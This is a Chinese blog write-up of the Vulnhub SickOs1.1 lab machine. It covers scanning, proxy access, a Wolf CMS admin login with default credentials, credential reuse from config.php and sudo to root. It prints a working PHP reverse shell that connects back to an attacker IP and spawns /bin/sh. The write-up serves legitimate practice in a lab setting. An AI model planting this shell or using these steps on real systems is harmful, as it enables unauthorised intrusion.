记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

【Vulnhub】SickOs1.1

2020-10-25 12:58


靶机地址:

https://www.vulnhub.com/entry/sickos-11,132/


nmap 扫描一下端口



3128 端口开着一个代理服务,使用它提供的代理去访问一下



访问 robots 得到一个 cms



访问 robots.txt 中的 /wolfcms



搜一下,得到后台登录页面:/?/admin/login



使用默认账号密码 admin:admin 登录成功

后台可以写文件啥的,写个 php 的反弹 shell

<?php
$ip = '192.168.17.1';
$port = '6666';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec, $pipes);
proc_close($process);
?>


在 config.php 中找到了数据库的用户名与密码



用数据库的那个密码试一下,登录用户:sickos,成功!

同时既然已经知道了密码,sudo -s 直接拿到了 root 权限



没学到什么新的知识 Orz,现在做靶机感觉越来越没啥意思了,想想该是因为是参考了别人的 wp 做出来的吧 。做了也 30 多个了,后面就尽量自己做,反正跟 CTF 题一样必然有解,这样应该就不能一周一更了,毕竟大部分时间还是想放在 pwn 的学习上。

就这字数还不够!?阿巴阿巴阿巴阿巴阿巴阿巴


知识来源: https://mp.weixin.qq.com/s?__biz=MzU5OTU3NDEzOQ==&mid=2247487892&idx=1&sn=9cc7dc9501e81b7a6f59abbd308d60bb

阅读:403961 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“【Vulnhub】SickOs1.1”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

🙇🧎¥由自富财,长成起一↓

标签云 ☁